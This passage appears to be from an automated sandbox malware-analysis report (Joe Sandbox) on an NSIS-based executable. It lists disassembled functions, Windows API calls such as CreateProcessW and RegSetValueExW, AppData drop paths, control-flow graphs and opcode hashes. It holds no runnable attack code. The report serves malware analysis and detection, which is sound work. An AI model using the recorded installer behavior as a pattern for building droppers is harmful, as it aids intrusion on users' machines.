                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot file identical to those listed above)
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp$C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                          • API String ID: 1941528284-1425817745
                                                          • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                          • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                          • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                          • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

Control-flow Graph
                                                          control_flow_graph 700 4030fa-403111 701 403113 700->701 702 40311a-403123 700->702 701->702 703 403125 702->703 704 40312c-403131 702->704 703->704 705 403141-40314e call 403315 704->705 706 403133-40313c call 40332b 704->706 710 403303 705->710 711 403154-403158 705->711 706->705 712 403305-403306 710->712 713 4032ae-4032b0 711->713 714 40315e-4031a7 GetTickCount 711->714 717 40330e-403312 712->717 715 4032f0-4032f3 713->715 716 4032b2-4032b5 713->716 718 40330b 714->718 719 4031ad-4031b5 714->719 720 4032f5 715->720 721 4032f8-403301 call 403315 715->721 716->718 722 4032b7 716->722 718->717 723 4031b7 719->723 724 4031ba-4031c8 call 403315 719->724 720->721 721->710 734 403308 721->734 727 4032ba-4032c0 722->727 723->724 724->710 733 4031ce-4031d7 724->733 730 4032c2 727->730 731 4032c4-4032d2 call 403315 727->731 730->731 731->710 737 4032d4-4032e0 call 405e26 731->737 736 4031dd-4031fd call 4067bd 733->736 734->718 742 403203-403216 GetTickCount 736->742 743 4032a6-4032a8 736->743 744 4032e2-4032ec 737->744 745 4032aa-4032ac 737->745 746 403261-403263 742->746 747 403218-403220 742->747 743->712 744->727 748 4032ee 744->748 745->712 751 403265-403269 746->751 752 40329a-40329e 746->752 749 403222-403226 747->749 750 403228-40325e MulDiv wsprintfW call 4052e6 747->750 748->718 749->746 749->750 750->746 755 403280-40328b 751->755 756 40326b-403272 call 405e26 751->756 752->719 753 4032a4 752->753 753->718 758 40328e-403292 755->758 760 403277-403279 756->760 758->736 761 403298 758->761 760->745 762 40327b-40327e 760->762 761->718 762->758
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot file identical to those listed above)
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$@
                                                          • API String ID: 551687249-3859443358
                                                          • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                          • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                          • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                          • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

                                                          Control-flow Graph
                                                          • Function at 402644 (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                            • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                          • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                          • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                          • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                          Control-flow Graph
                                                          • Function at 4065ec (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                          • wsprintfW.USER32 ref: 0040663E
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

                                                          Control-flow Graph
                                                          • Function at 4057b5 (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                          • GetLastError.KERNEL32 ref: 0040580C
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                          • GetLastError.KERNEL32 ref: 0040582B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 3449924974-224404859
                                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

                                                          Control-flow Graph
                                                          • Function at 405da3 (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405DC1
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\450707124374000811.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1233918687
                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

                                                          Control-flow Graph
                                                          • Function at 10001759 (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                          Control-flow Graph
                                                          • Function at 40202c (rendered graph omitted; legend: Executed / Not Executed)
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID: pv\
                                                          • API String ID: 334405425-2953343725
                                                          • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                          • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                          • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                          • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000023,00000011,00000002), ref: 00402429
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402469
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp
                                                          • API String ID: 2655323295-3207034729
                                                          • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                          • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                          • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                          • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                          APIs
                                                          • GlobalFree.KERNEL32(005C7670), ref: 00401BE1
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call$pv\
                                                          • API String ID: 3394109436-2887556045
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          APIs
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,00000000,000000F0), ref: 0040164D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 00401640
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                          • API String ID: 1892508949-410581097
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405289
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                            • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                          • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                          • CloseHandle.KERNEL32(?), ref: 0040589D
                                                          Strings
                                                          • Error launching installer, xrefs: 0040587A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          APIs
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                          • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                          • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 3248276644-0
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                          • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                          • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                          • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                          • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                          • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                          • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                            • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                            • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                            • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                          • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
